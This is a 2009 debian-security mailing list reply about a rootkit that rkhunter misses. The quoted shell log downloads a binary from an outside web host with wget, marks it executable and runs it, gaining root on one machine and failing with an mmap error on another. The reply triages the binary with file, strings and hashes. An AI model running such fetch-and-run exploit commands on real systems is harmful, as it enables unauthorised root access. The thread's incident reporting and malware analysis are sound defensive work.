Re: rootkit not found by rkhunter

To: debian-security@lists.debian.org
Cc: abuse@facill.com.br
Subject: Re: rootkit not found by rkhunter
From: Henri Salo <henri@nerv.fi>
Date: Sun, 4 Oct 2009 18:21:57 +0300
Message-id: <[🔎] 20091004182157.14508147@foo.fgeek.fi>
In-reply-to: <[🔎] 20091004141535.GA23593@openlib.org>
References: <[🔎] 20091004141535.GA23593@openlib.org>

On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <krichel@openlib.org> wrote:

>   I am running debian testing, 2.6.30 kernel.
> 
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
> 
>   Here it works to allow a non-root user to become root
> 
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
> 
> 100%[======================================>] 6,886       6.88K/s
> in 1.0s    
> 
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
> 
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a# 
> 
>   Here is a situation where it does not work 
> 
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
> 
> 100%[======================================>] 6,886       37.8K/s
> in 0.2s    
> 
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
> 
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
> 
> 
>   Does anybody here know how to delete this kit?
> 
> 
>   Cheers,
> 
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

This file should at least be deleted from the host.

fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a

Reply to:

References:
- rootkit not found by rkhunter
  - From: Thomas Krichel <krichel@openlib.org>

Prev by Date: Re: rootkit not found by rkhunter
Next by Date: Re: rootkit not found by rkhunter
Previous by thread: Re: rootkit not found by rkhunter
Next by thread: rkhunter message
Index(es):
- Date
- Thread